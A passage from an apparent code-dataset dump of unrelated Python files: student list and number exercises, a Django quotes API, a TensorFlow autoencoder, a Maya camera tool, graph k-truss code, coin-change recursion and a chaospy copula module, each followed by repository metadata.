0\n\ndef zadacha_19(): # 19. Реализуйте алгоритм задания случайных чисел без использования\n # встроенного генератора псевдослучайных чисел.\n os.system('sls' if os == 'nt' else 'clear')\n # n = 10\n # a = 1234\n # c = 89567\n # m = 45\n # my_list = []\n # for i in range(n):\n # my_list.append(round(((a ** i - 1) / (a - 1) * c) % m))\n # print(my_list)\n\n # my_list = ([int(str(time.time())[-1]) for i in range(10)])\n # print(my_list)\n\n seconds = time.time()\n rand = int(100*(seconds % 1))\n print(rand)\n\n\ndef zadacha_20(): # 20. Задайте список. Напишите программу, которая определит,\n # присутствует ли в заданном списке строк некое число.\n os.system('sls' if os == 'nt' else 'clear')\n string_1 = ['sdf34sdf', 'lkj324o', 'poics99l', '93n1', 'mklja56a8']\n print(string_1)\n numb = int(input('Введите искомое число: '))\n count = 0\n for i in string_1:\n # if i.find(str(numb)) != -1:\n # print(f'{i} содержит {numb}')\n if str(numb) in i:\n print(f'{i} содержит {numb}')\n count += 1\n if count == 0:\n print(f'{numb} не содержится в списке')\n\n\ndef zadacha_21(): # 21. Напишите программу, которая определит позицию второго вхождения\n # строки в списке либо сообщит, что её нет.\n os.system('sls' if os == 'nt' else 'clear')\n list_1 = [\"qwe\", \"asd\", \"zxc\", \"qwe\", \"ertqwe\"]\n my_str = input('Введите строку: ')\n count = 0\n v_index = 0\n for i in range(len(list_1)):\n if my_str == list_1[i]:\n count += 1\n if count == 2:\n v_index = i\n break\n if count == 0:\n print(f'У {my_str} нет вхождения в {list_1}')\n elif count < 2:\n print(f'У {my_str} нет второго вхождения в {list_1}')\n elif count == 2:\n print(f'У {my_str} имеется второе вхождения в {list_1} с индексом {v_index}')\n\n\ndef zadacha_22(): # 22. Задайте список из нескольких чисел. Напишите программу, которая найдёт\n # сумму элементов списка, стоящих на нечётной позиции.\n os.system('sls' if os == 'nt' else 'clear')\n size = 10\n rand_from = -44\n rand_to = 44\n my_list = random_int_fill_list(size, rand_from, rand_to)\n sum_of_odd_ind_elms = 0\n for i in range(1, len(my_list), 2):\n sum_of_odd_ind_elms += my_list[i]\n print(\n f'Сумма элементов списка {my_list} с нечетными индексами = {sum_of_odd_ind_elms}')\n\n\ndef zadacha_23(): # 23. Напишите программу, которая найдёт произведение пар чисел списка. Парой\n # считаем первый и последний элемент, второй и предпоследний и т.д.\n os.system('sls' if os == 'nt' else 'clear')\n size = int(input('Введите количество элементов списка: '))\n rand_from = 0\n rand_to = 20\n my_list = random_int_fill_list(size, rand_from, rand_to)\n pairs_mult = 1\n res = []\n for i in range(math.ceil(size / 2)):\n pairs_mult = my_list[i] * my_list[size - 1 - i]\n res.append(pairs_mult)\n print(\n f'Произведения пар элементов списка {my_list} \"снаружи внутрь\" = {res}')\n print()\n\n\ndef zadacha_24(): # 24. Задайте список из вещественных чисел. Напишите программу, которая найдёт\n # разницу между максимальным и минимальным значением дробной части элементов.\n os.system('cls' if os == 'nt' else 'clear')\n size = 10\n my_list = random_float_fill_list(size)\n print(my_list)\n new_lst = ([round(i % 1, 2) for i in my_list])\n print(new_lst)\n res = max(new_lst) - min(new_lst)\n print(res)\n # ИЛИ:\n # print(my_list)\n # min_val = 99\n # max_val = 0\n # for i in range(size):\n # if my_list[i] % 1 < min_val and my_list[i] % 1 != 0:\n # min_val = round(my_list[i] % 1, 2)\n # elif my_list[i] % 1 > max_val:\n # max_val = round(my_list[i] % 1, 2)\n \n # print(f'Максимальное значение дробной части элементов списка: {max_val}')\n # print(f'Минимальное значение дробной части элементов списка: {min_val}')\n # print(f'Разница между максимальным и минимальным значением дробной части элементов составляет {round(max_val - min_val, 2)}')\n\ndef zadacha_25(): #25. Напишите программу, которая будет преобразовывать \n # десятичное число в двоичное.\n os.system('cls' if os == 'nt' else 'clear')\n sys_sch = 2\n numb = check_for_enter_error()\n # while True:\n # numb = input('Введите любое целое положительное число больше 0: ')\n # if numb.isdigit():\n # numb = int(numb)\n # if numb == 0:\n # os.system('cls' if os == 'nt' else 'clear')\n # print('Число должно быть больше 0! Повторите ввод!')\n # else: break\n # else: \n # os.system('cls' if os == 'nt' else 'clear')\n # print('Ошибка ввода!') \n os.system('cls' if os == 'nt' else 'clear')\n numb_res = numb\n my_list = []\n while int(numb_res) > 0:\n my_list.insert(0, int(numb_res % sys_sch))\n numb_res /= sys_sch\n my_str: str = \"\"\n for i in my_list:\n my_str += str(i)\n my_str = int(my_str)\n print(f'{numb} в {sys_sch}-й системе счисления: {my_str}')\n \ndef zadacha_26(): # 26. Задайте число. Составьте список чисел Фибоначчи, \n # в том числе для отрицательных индексов.\n os.system('cls' if os == 'nt' else 'clear')\n numb = check_for_enter_error()\n my_list = []\n for i in range(-numb, numb + 1):\n my_list.append(fib(i))\n print(my_list)\n \n\n \n \n \n\n# zadacha_19()\n# zadacha_20()\n# zadacha_21()\n# zadacha_22()\n# zadacha_23()\nzadacha_24()\n# zadacha_25()\n# zadacha_26()","repo_name":"Marphiy/PY_Sem3","sub_path":"Sem3.py","file_name":"Sem3.py","file_ext":"py","file_size_in_byte":8082,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10848712800","text":"from quotes.models import Quote\nfrom quotes.serializers import QuoteSerializer\n\nfrom rest_framework import viewsets\nfrom rest_framework.response import Response\n\n\nclass QuoteViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint to view and edit quotes.\n \"\"\"\n queryset = Quote.all_active()\n serializer_class = QuoteSerializer\n\n def list(self, request, *args, **kwargs):\n response = super().list(request, *args, **kwargs)\n response.data = {\"results\": response.data}\n\n return response\n\n def vote(f):\n def vote_internal(self, request, pk=None):\n quote = self.get_object()\n f(quote)\n quote.save()\n\n score = quote.score_up - quote.score_down\n return Response({\n 'status': 'OK',\n 'score': score\n })\n\n return vote_internal\n\n# @action(permission_classes=(AllowAny,))\n# @vote\n# def upvote(quote):\n# quote.score_up += 1\n#\n# @action(permission_classes=(AllowAny,))\n# @vote\n# def downvote(self, request, pk=None):\n# quote.score_down += 1\n","repo_name":"tari/decbot_web","sub_path":"quotes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6966356920","text":"# -*- coding: utf-8 -*-\n\n# for mounting with goggle drives\n# import sys\n# sys.path.append('/content/drive/MyDrive/tesorflow2.0 연습/VAE')\n# print(sys.path)\n\nimport load_data\nimport tensorflow as tf\nimport numpy as np\n\nfrom tensorflow.keras import Model, layers\nfrom tensorflow.keras.layers import Conv2D, Dense, MaxPool2D, Flatten, Conv2DTranspose, Reshape, Input\n\n\ndef sampling(mean, sigma):\n shape = np.shape(mean.numpy())\n return tf.random.normal(shape, mean, sigma, dtype=tf.float32)\n\nclass Encoder(layers.Layer):\n def __init__(self,\n latent_dim=16,\n intermediate_dim=64,\n name='encoder'\n ):\n super(Encoder, self).__init__(name=name)\n \n self.h0 = Dense(intermediate_dim, activation='relu')\n self.h1 = Dense(intermediate_dim, activation='relu')\n self.mean = Dense(latent_dim)\n self.sigma = Dense(latent_dim)\n\n def call(self, inputs):\n h0 = self.h0(inputs)\n h1 = self.h1(h0)\n mean = self.mean(h1)\n sigma = self.sigma(h1)\n z = sampling(mean, sigma)\n return mean, sigma, z\n\nclass Decoder(layers.Layer):\n def __init__(\n self,\n intermediate_dim = 64,\n img_dim=784,\n name='decoder'\n ):\n super(Decoder, self).__init__(name=name)\n self.h0 = Dense(intermediate_dim, activation='relu')\n self.h1 = Dense(intermediate_dim, activation='relu')\n self.reconstruct = Dense(img_dim, activation='sigmoid')\n\n def call(self, inputs):\n h0 = self.h0(inputs)\n h1 = self.h1(h0)\n reconstruct = self.reconstruct(h1)\n return reconstruct\n\nclass VariationalAutoencoder(layers.Layer):\n def __init__(self,\n img_dim,\n intermediate_dim,\n latent_dim,\n name='vae'\n ):\n super(VariationalAutoencoder, self).__init__(name=name)\n self.encoder=Encoder(latent_dim=latent_dim,\n intermediate_dim=intermediate_dim,\n )\n self.decoder=Decoder(intermediate_dim=intermediate_dim,\n img_dim=img_dim)\n \n \n def call(self, inputs):\n z_mean, z_log_var, z = self.encoder(inputs)\n reconstructed = self.decoder(z)\n kl_loss = - 0.5 * tf.reduce_mean(\n z_log_var - tf.square(z_mean) - tf.exp(z_log_var) + 1)\n self.add_loss(kl_loss)\n return reconstructed\n\n\n\n","repo_name":"DaeseungLee/VAE-Tensorflow2.0","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"14859206898","text":"from os.path import abspath, dirname\nfrom sys import stderr\n\nfrom PySide2.QtCore import QEvent, Qt\nfrom PySide2.QtUiTools import QUiLoader\nfrom PySide2.QtWidgets import QMainWindow, QWidget, QComboBox, QStyledItemDelegate\nfrom maya import cmds as maya_cmds\nfrom maya.OpenMayaUI import MQtUtil\nfrom maya.api import OpenMaya, OpenMayaUI\nfrom shiboken2 import wrapInstance\n\nclass ToolSeq_Cameras(QWidget):\n\n\tuserScriptDir = dirname(abspath(__file__)) + '/'\n\n\tqUiLoader = QUiLoader()\n\tqUiLoader.setWorkingDirectory(userScriptDir)\n\n\twindowMain = wrapInstance(int(MQtUtil.mainWindow()), QMainWindow)\n\n\tdef __init__(self):\n\t\tsuper(ToolSeq_Cameras, self).__init__(ToolSeq_Cameras.windowMain)\n\n\t\tself.window = ToolSeq_Cameras.qUiLoader.load(ToolSeq_Cameras.userScriptDir + 'ui/ToolSeq_Cameras.ui', self)\n\t\tself.window.setWindowFlags(self.window.windowFlags() & ~Qt.WindowMinMaxButtonsHint)\n\t\tself.window.setAttribute(Qt.WA_DeleteOnClose)\n\t\tfor qComboBox in self.window.findChildren(QComboBox):\n\t\t\tqComboBox.setItemDelegate(QStyledItemDelegate(qComboBox))\n\t\twith open(ToolSeq_Cameras.userScriptDir + 'ToolSeq.qss', 'r') as fileStyleSheet:\n\t\t\tself.window.setStyleSheet(fileStyleSheet.read())\n\n\t\tself.window.Button_P.installEventFilter(self)\n\t\tself.window.Button_TB.installEventFilter(self)\n\t\tself.window.Button_FB.installEventFilter(self)\n\t\tself.window.Button_LR.installEventFilter(self)\n\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tself.Activity_CreateAll()\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\t\tself.window.show()\n\n\tdef eventFilter(self, source, event):\n\t\tsourceObjectName = source.objectName()\n\t\teventType = event.type()\n\t\tif sourceObjectName == 'Button_P':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Perspective')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Perspective')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_TB':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Top')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Bottom')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_FB':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Front')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Back')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\telif sourceObjectName == 'Button_LR':\n\t\t\tif eventType == QEvent.MouseButtonRelease:\n\t\t\t\teventButton = event.button()\n\t\t\t\tif eventButton == Qt.LeftButton:\n\t\t\t\t\tself.Action_Camera('Camera_Left')\n\t\t\t\telif eventButton == Qt.RightButton:\n\t\t\t\t\tself.Action_Camera('Camera_Right')\n\t\t\t\telif eventButton == Qt.MiddleButton:\n\t\t\t\t\tToolSeq_Cameras.Action_Ortographic()\n\t\treturn False\n\n\t@staticmethod\n\tdef Activity_CreateAll():\n\t\tselection = maya_cmds.ls(selection=True)\n\n\t\tif not maya_cmds.objExists('ToolSeq_Cameras'):\n\t\t\tmaya_cmds.group(empty=True, name='ToolSeq_Cameras')\n\t\t\tmaya_cmds.hide('ToolSeq_Cameras')\n\t\t\tmaya_cmds.reorder('ToolSeq_Cameras', front=True)\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Perspective', 'persp')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Top', 'top')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Bottom', 'bottom')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Front', 'front')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Back', 'back')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Left', 'left')\n\t\tToolSeq_Cameras.Activity_CreateCamera('Camera_Right', 'right')\n\n\t\tmaya_cmds.select(selection)\n\n\t@staticmethod\n\tdef Activity_CreateCamera(cameraName, cameraDirection):\n\t\tif maya_cmds.objExists(cameraName):\n\t\t\treturn\n\n\t\tif cameraDirection in ['persp', 'top', 'front', 'left']:\n\t\t\tmaya_cmds.duplicate(cameraDirection.replace('left', 'side'), name=cameraName)\n\t\telif cameraDirection == 'bottom':\n\t\t\tmaya_cmds.duplicate('top', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateX', 90)\n\t\telif cameraDirection == 'back':\n\t\t\tmaya_cmds.duplicate('front', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateY', 180)\n\t\telif cameraDirection == 'right':\n\t\t\tmaya_cmds.duplicate('side', name=cameraName)\n\t\t\tmaya_cmds.setAttr(cameraName + '.rotateY', -90)\n\t\tmaya_cmds.hide(cameraName)\n\t\tmaya_cmds.parent(cameraName, 'ToolSeq_Cameras')\n\t\tmaya_cmds.reorder(cameraName, back=True)\n\n\t@staticmethod\n\tdef Action_DeleteAll():\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tmaya_cmds.lookThru('modelPanel1', 'top')\n\t\t\tmaya_cmds.lookThru('modelPanel2', 'side')\n\t\t\tmaya_cmds.lookThru('modelPanel3', 'front')\n\t\t\tmaya_cmds.lookThru('modelPanel4', 'persp')\n\t\t\tmaya_cmds.delete('Camera_Perspective', 'Camera_Top', 'Camera_Bottom', 'Camera_Front', 'Camera_Back', 'Camera_Left', 'Camera_Right', 'ToolSeq_Cameras')\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\tdef Action_Camera(self, cameraName):\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\tif not maya_cmds.objExists(cameraName):\n\t\t\t\tself.Activity_CreateAll()\n\t\t\tmaya_cmds.lookThru(cameraName)\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)\n\n\t@staticmethod\n\tdef Action_Ortographic():\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=False)\n\t\ttry:\n\t\t\torthographic = OpenMaya.MFnDependencyNode(OpenMayaUI.M3dView.active3dView().getCamera().node()).findPlug('orthographic', True)\n\t\t\torthographic.setBool(not orthographic.asBool())\n\t\texcept Exception as e:\n\t\t\tprint(str(e), file=stderr)\n\t\tmaya_cmds.undoInfo(stateWithoutFlush=True)","repo_name":"canerozdemircgi/ToolSeq","sub_path":"Contents/scripts/ToolSeq_Cameras.py","file_name":"ToolSeq_Cameras.py","file_ext":"py","file_size_in_byte":5902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39092483466","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nmylist = ['мяч', 'палка', 'луна', 'садик', 'дерево', 'небо']\ns = input(\"Введите элемент списка \")\n\nif s not in mylist:\n print(\"Такого элемента в списке нет\")\nelse:\n print(mylist.index(s))\n","repo_name":"AlexandrM333/labrab6","sub_path":"Задания/zadan1.py","file_name":"zadan1.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11432892028","text":"import sys\nimport time\nfrom os import listdir\nfrom os.path import isfile, join\nimport networkx as nx\nfrom igraph import *\nimport igraph as ix\nimport matplotlib.pyplot as plt\nimport scipy.io as spio\nimport pandas as pd\n#from utils import *\n\n\ncolorlist = {0:\"red\", 1:\"orange\", 2:\"green\",3:\"yellow\", 4:\"pink\",5:\"blue\", 6:\"azure\",7:\"cyan\",8:\"magenta\",9:\"purple\",10:\"white\",\\\n 11:\"peru\",12:\"sienna\",13:\"navy\",14:\"tomato\",15:\"violet\",16:\"plum\",17:\"thistle\",18:\"orchid\",19:\"beige\",20:\"tan\",\\\n 21:\"orchid\",22:\"lavender\",23:\"goldenrod\",24:\"khaki\",25:\"grey\",26:\"ivory\",27:\"salmon\",28:\"royalblue\",29:\"limegreen\",30:\"seagreen\",\\\n 31:\"burlywood\",32:\"coral\",33:\"black\",34:\"sandybrown\",35:\"firebrick\"\\\n }\n\ndef triangles(G,nodes=None):\n if nodes is None:\n nodes_nbrs = G.adj.items()\n else:\n nodes_nbrs= ( (n,G[n]) for n in G.nbunch_iter(nodes) )\n for v,v_nbrs in nodes_nbrs:\n vs=set(v_nbrs) -set([v])\n ntriangles=0\n for w in vs:\n ws=set(G[w])-set([w])\n ntriangles+=len(vs.intersection(ws))\n yield (v,len(vs),ntriangles)\n\ndef edge_support(G):\n neighbors=G.neighborhood() #neighbors_iter\n nbrs=dict((v.index,set(neighbors[v.index])) for v in G.vs)\n support = {}\n for e in G.es:\n nod1,nod2 = e.source, e.target\n nod1_nbrs = set(nbrs[nod1])-set([nod1])\n nod2_nbrs = set(nbrs[nod2])-set([nod2])\n sup = len(nod1_nbrs.intersection(nod2_nbrs))\n #G[nod1][nod2]['support'] = sup\n support[(nod1,nod2)] = sup\n #print 'support :', support\n return support\n\ndef ktruss(G):\n #G = G.simplify() #assume graph is simple\n #G.to_undirected(mode=False)\n support = edge_support(G)\n edges=sorted(support,key=support.get)\n bin_boundaries=[0]\n curr_support=0\n for i,e in enumerate(edges):\n if support[e]>curr_support:\n bin_boundaries.extend([i]*(support[e]-curr_support))\n curr_support=support[e]\n\n edge_pos = dict((e,pos) for pos,e in enumerate(edges))\n #print 'edge-pos:',edge_pos\n truss={} ## initial guesses for truss is support\n neighbors=G.neighborhood() #neighbors_iter\n #print 'neighbors:', neighbors\n nbrs=dict((v.index,(set(neighbors[v.index])-set([v.index]))) for v in G.vs)\n #nbrs=dict((v.index,set(neighbors[v.index])) for v in G.vs)\n #print 'nbrs:', nbrs\n for e in edges:\n #print 'processing edge : ', e, 'support :', support[e], 'pos:', edge_pos[e]\n u,v =e[0], e[1]\n if not(u == v) :\n common_nbrs = set(nbrs[u]).intersection(nbrs[v])\n #print u,v,'common_nbrs',common_nbrs\n for w in common_nbrs:\n if (u,w) in support :\n e1 = (u,w)\n else :\n e1 = (w,u)\n if (v,w) in support :\n e2 = (v,w)\n else:\n e2 = (w,v)\n pos=edge_pos[e1]\n if support[e1] > support[e] :\n bin_start=bin_boundaries[support[e1]]\n edge_pos[e1]=bin_start\n edge_pos[edges[bin_start]]=pos\n edges[bin_start],edges[pos]=edges[pos],edges[bin_start]\n bin_boundaries[support[e1]]+=1\n #print 'e1',e1,'support:',support[e1], 'pos:', pos, 'new pos:', edge_pos[e1]\n\n pos=edge_pos[e2]\n if support[e2] > support[e] :\n bin_start=bin_boundaries[support[e2]]\n edge_pos[e2]=bin_start\n edge_pos[edges[bin_start]]=pos\n edges[bin_start],edges[pos]=edges[pos],edges[bin_start]\n bin_boundaries[support[e2]]+=1\n #print 'e2',e2,'support:',support[e2], 'pos:', pos, 'new pos:', edge_pos[e2]\n\n support[e1] = max(support[e], support[e1]-1)\n support[e2] = max(support[e], support[e2]-1)\n\n truss[e] = support[e] + 2\n nbrs[u].remove(v)\n nbrs[v].remove(u)\n #print 'Truss: ', truss\n #print 'Sorted Truss: ', sorted(truss,key=truss.get)\n return truss\n\n\ndef get_ktrussProbs(g, name):\n print (\"Extracting KTruss features: %s\" % name)\n trussness = ktruss(g).values()\n n = len(trussness)\n d = {n:trussness.count(n) for n in range(2,max(trussness)+1)}\n ktrussprobability = [d[key] / (n * 1.0) for key in sorted(d)]\n return (ktrussprobability)\n\ndef getnodetrussness(graph):\n # Me\n dict_node_truss = {}\n n = graph.vcount()\n ktrussdict = ktruss(graph)\n nodetruss = [0] * n\n for edge in graph.es:\n source = edge.source\n target = edge.target\n if not (source == target) :\n t = ktrussdict[(source,target)]\n else:\n t = 0\n nodetruss[source] = max(nodetruss[source], t)\n nodetruss[target] = max(nodetruss[target], t)\n \n \n\n return nodetruss\n\t\ndef getnodetrussnessdict(graph):\n sr_node_ktruss_dict = {} \n n = graph.vcount()\n ktrussdict = ktruss(graph)\n nodetruss = [0] * n\n for edge in graph.es:\n source = edge.source\n target = edge.target\n if not (source == target) :\n t = ktrussdict[(source,target)]\n else:\n t = 0\n nodetruss[source] = max(nodetruss[source], t)\n nodetruss[target] = max(nodetruss[target], t)\n d = {}\n node_index = 0\n node_truss_value = 0\n while (node_index int:\n memo = [0] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base cases\n if target == 0:\n return 1\n if target < 0:\n return 0\n\n # Already computed result\n if memo[target] > 0:\n return memo[target]\n\n count = 0\n for coin in coins:\n diff = target - coin\n if diff >= 0:\n count += f(coins, diff)\n\n memo[target] = count\n return count\n\n return f(coins, target)\n\n\ndef count_max_num_coins(coins: list, target: int) -> int:\n memo = [-1] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base case\n if target == 0:\n return 0\n\n # Already computed result\n if memo[target] >= 0:\n return memo[target]\n\n max_coins = -1\n\n # Loop over the different coins available\n for coin in coins:\n diff = target - coin\n # Skip a coin if its value is less than amount\n # remaining `diff`\n if diff >= 0:\n curr_max_coins = f(coins, diff)\n if curr_max_coins > max_coins:\n max_coins = curr_max_coins\n\n # Add back the coin removed recursively\n memo[target] = max_coins + 1\n return memo[target]\n\n ans = f(coins, target)\n return ans if ans <= MAX_INT else -1\n\n\ndef count_min_num_coins(coins: list, target: int) -> int:\n memo = [-1] * (target + 1)\n\n def f(coins: list, target: int) -> int:\n # Base case\n if target == 0:\n return 0\n\n # Already computed result\n if memo[target] >= 0:\n return memo[target]\n\n min_coins = MAX_INT\n\n # Loop over the different coins available\n for coin in coins:\n diff = target - coin\n # Skip a coin if its value is greater than amount\n # remaining `diff`\n if diff >= 0:\n curr_min_coins = f(coins, diff)\n if curr_min_coins < min_coins:\n min_coins = curr_min_coins\n\n # Add back the coin removed recursively\n memo[target] = min_coins + 1\n return memo[target]\n\n ans = f(coins, target)\n return ans if ans <= MAX_INT else -1\n\n\ndef all_changes(coins: list, target: int) -> int:\n pass\n\n\ndef max_coins_change(coins: list, target: int) -> int:\n pass\n\n\ndef min_coins_change(coins: list, target: int) -> int:\n pass\n\n\nif __name__ == \"__main__\":\n print(\"-\" * 60)\n print(\"Making change\")\n print(\"-\" * 60)\n\n coins = [1, 2, 5, 10, 25]\n test_cases = [\n (coins, 1),\n (coins, 2),\n (coins, 5),\n (coins, 6),\n (coins, 16),\n (coins, 26),\n (coins, 49),\n ([2, 6], 13),\n (coins, 888),\n ]\n\n for coins, target in test_cases:\n\n print(\"Coins:\", coins, \"\\tTarget:\", target)\n print(\"Number of possible change combinations\", count_ways(coins, target))\n print(\"Minimum number of coins\", count_min_num_coins(coins, target))\n print(\"Maximum number of coins\", count_max_num_coins(coins, target))\n\n print()\n\n # print(\"\\n>>> Custom jumps\")\n # steps = 20\n # jumps = [1, 3]\n # print(\"\\nsteps:\", steps)\n # print(\"jumps:\", jumps)\n # print(\"Ways count:\", dp_iterative_custom_jumps(steps, jumps))\n # steps = 20\n # jumps = [3, 6]\n # print(\"\\nsteps:\", steps)\n # print(\"jumps:\", jumps)\n # print(\"Ways count:\", dp_iterative_custom_jumps(steps, jumps))\n","repo_name":"daalgi/algorithms","sub_path":"dynamic_programming/make_change/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"21828596092","text":"\"\"\"Base module for system services\"\"\"\nfrom abc import abstractmethod\n\nfrom appcore.domain.models.model_core import ModelCore\n\n\n# pylint: disable=too-few-public-methods\nclass ServiceCore:\n \"\"\"Base service for app services\"\"\"\n\n # pylint: disable=too-few-public-methods\n class Meta:\n \"\"\"Service core metaclass\"\"\"\n abstract = True\n\n @abstractmethod\n def execute(self, validate_data: dict) -> ModelCore:\n \"\"\"execute service function\"\"\"\n","repo_name":"NelsonManuelGM/django-core","sub_path":"appcore/domain/services/service_core.py","file_name":"service_core.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10746955548","text":"r\"\"\"\nA cumulative distribution function of an independent multivariate random\nvariable can be made dependent through a copula as follows:\n\n.. math::\n F_{Q_0,\\dots,Q_{D-1}} (q_0,\\dots,q_{D-1}) =\n C(F_{Q_0}(q_0), \\dots, F_{Q_{D-1}}(q_{D-1}))\n\nwhere :math:`C` is the copula function, and :math:`F_{Q_i}` are marginal\ndistribution functions. One of the more popular classes of copulas is the\nArchimedean copulas.\n.. \\cite{sklar_random_1996}.\nThey are defined as follows:\n\n.. math::\n C(u_1,\\dots,u_n) =\n \\phi^{[-1]} (\\phi(u_1)+\\dots+\\phi(u_n)),\n\nwhere :math:`\\phi` is a generator and :math:`\\phi^{[-1]}` is its\npseudo-inverse. Support for Archimedean copulas in `chaospy` is possible\nthrough reformulation of the Rosenblatt transformation. In two dimension, this\nreformulation is as follows:\n\n.. math::\n\n F_{U_0}(u_0) = \\frac{C(u_0,1)}{C(1,1)}\n\n F_{U_1\\mid U_0}(u_1\\mid u_0) =\n \\frac{\\tfrac{\\partial}{\\partial u_0}\n C(u_0,u_1)}{\\tfrac{\\partial}{\\partial u_0} C(u_0,1)}\n\nThis definition can also be generalized in to multiple variables using the\nformula provided by Nelsen 1999.\n.. cite:: nelsen_introduction_1999\n\nThe definition of the Rosenblatt transform can require multiple\ndifferentiations. An analytical formulation is usually not feasible, so the\nexpressions are estimated using difference scheme similar to the one outlined\nfor probability density function defined in :ref:`distributions`. The accurate\nmight therefore be affected.\n\nSince copulas are meant as a replacement for Rosenblatt\ntransformation, it is usually assumed that the distribution it is\nused on is stochastically independent.\nHowever in the definition of a copula does not actually require it, and sine\nthe Rosenblatt transformation allows for it, multiple copulas can be stacked\ntogether in `chaospy`.\n\"\"\"\nimport numpy as np\n\nfrom ..backend import Dist\n\nclass Copula(Dist):\n\n def __init__(self, dist, trans):\n \"\"\"\n Args:\n dist (Dist) : Distribution to wrap the copula around.\n trans (Dist) : The copula wrapper `[0,1]^D \\into [0,1]^D`.\n \"\"\"\n Dist.__init__(self, dist=dist, trans=trans,\n _advance=True, _length=len(trans))\n\n def _cdf(self, x, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n q = G(G(x, dist), trans)\n return q\n\n def _bnd(self, x, G):\n return G(x, G.D[\"dist\"])\n\n def _ppf(self, q, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n return G(G(q, trans), dist)\n\n def _pdf(self, x, G):\n dist, trans = G.D[\"dist\"], G.D[\"trans\"]\n return G(G.fwd_as_pdf(x, dist), trans)*G(x, dist)\n\n\nclass Archimedean(Dist):\n \"\"\"\n Archimedean copula superclass.\n\n Subset this to generate an archimedean.\n \"\"\"\n\n def _ppf(self, x, th, eps):\n\n for i in range(1, len(x)):\n\n q = x[:i+1].copy()\n lo, up = 0,1\n dq = np.zeros(i+1)\n dq[i] = eps\n flo, fup = -q[i],1-q[i]\n\n for iteration in range(1, 10):\n fq = self._diff(q[:i+1], th, eps)\n dfq = self._diff((q[:i+1].T+dq).T, th, eps)\n dfq = (dfq-fq)/eps\n dfq = np.where(dfq==0, np.inf, dfq)\n\n fq = fq-x[i]\n if not np.any(np.abs(fq)>eps):\n break\n\n # reduce boundaries\n flo = np.where(fq<=0, fq, flo)\n lo = np.where(fq<=0, q[i], lo)\n\n fup = np.where(fq>=0, fq, fup)\n up = np.where(fq>=0, q[i], up)\n\n # Newton increment\n qdq = q[i]-fq/dfq\n\n # if new val on interior use Newton\n # else binary search\n q[i] = np.where((qdqlo),\n qdq, .5*(up+lo))\n\n x[i] = q[i]\n return x\n\n\n def _cdf(self, x, th, eps):\n out = np.zeros(x.shape)\n out[0] = x[0]\n for i in range(1,len(x)):\n out[i][x[i]==1] = 1\n out[i] = self._diff(x[:i+1], th, eps)\n\n return out\n\n def _pdf(self, x, th, eps):\n out = np.ones(x.shape)\n sign = 1-2*(x>.5)\n for i in range(1,len(x)):\n x[i] += eps*sign[i]\n out[i] = self._diff(x[:i+1], th, 